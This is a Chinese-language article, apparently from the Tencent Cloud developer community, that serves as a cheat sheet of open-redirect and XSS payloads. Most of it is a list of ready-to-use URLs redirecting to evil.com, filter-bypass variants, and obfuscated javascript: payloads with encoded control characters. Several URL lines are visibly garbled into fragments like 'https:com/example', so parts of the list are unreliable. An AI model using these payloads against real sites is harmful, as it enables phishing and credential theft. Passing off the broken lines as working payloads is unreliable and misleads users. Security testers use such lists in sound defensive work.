http 参数可能包含 URL 值,并可能导致 Web 应用程序将请求重定向到指定的 URL。通过将 URL 值修改为恶意站点,攻击者可能会成功发起网络钓鱼诈骗并窃取用户凭据。由于修改后的链接中的服务器名称与原始站点相同,因此网络钓鱼尝试具有更可信的外观。
基本有效载荷:-
您可以尝试使用这些基本有效负载来测试任何应用程序上的开放重定向漏洞
https://example.com/login?redirect=http://evil.com
https://example.com/login?redirect=javascript:alert(1);
这里evil.com是我们的网站,如果example.com将您重定向到此,那么它很容易受到攻击。如果解决了这个问题,那么试试这个有效载荷:
https://example.com/login?redirect=http://example.com@evil.com
https://
https:com/example
如果这些都解决了,那么试试这些
https://example.com/login?redirect=http://example.com%3F.evil.com
https://
https:com/example
https://
https:com/evil
https://
https:com/example
其他开放重定向有效负载
https://example.com/login?next=//example.com@evil.com
https://example.com/login?next=/\/evil.com
https://
https:com/example
https://
https:com/Cevil
https//.
https:login/comhttp
尝试此 Intigriti 开放式重定向负载生成器工具
开放重定向的 XSS 有效负载
";alert(0);//
java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript pjavascriptt:confirm`0`
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。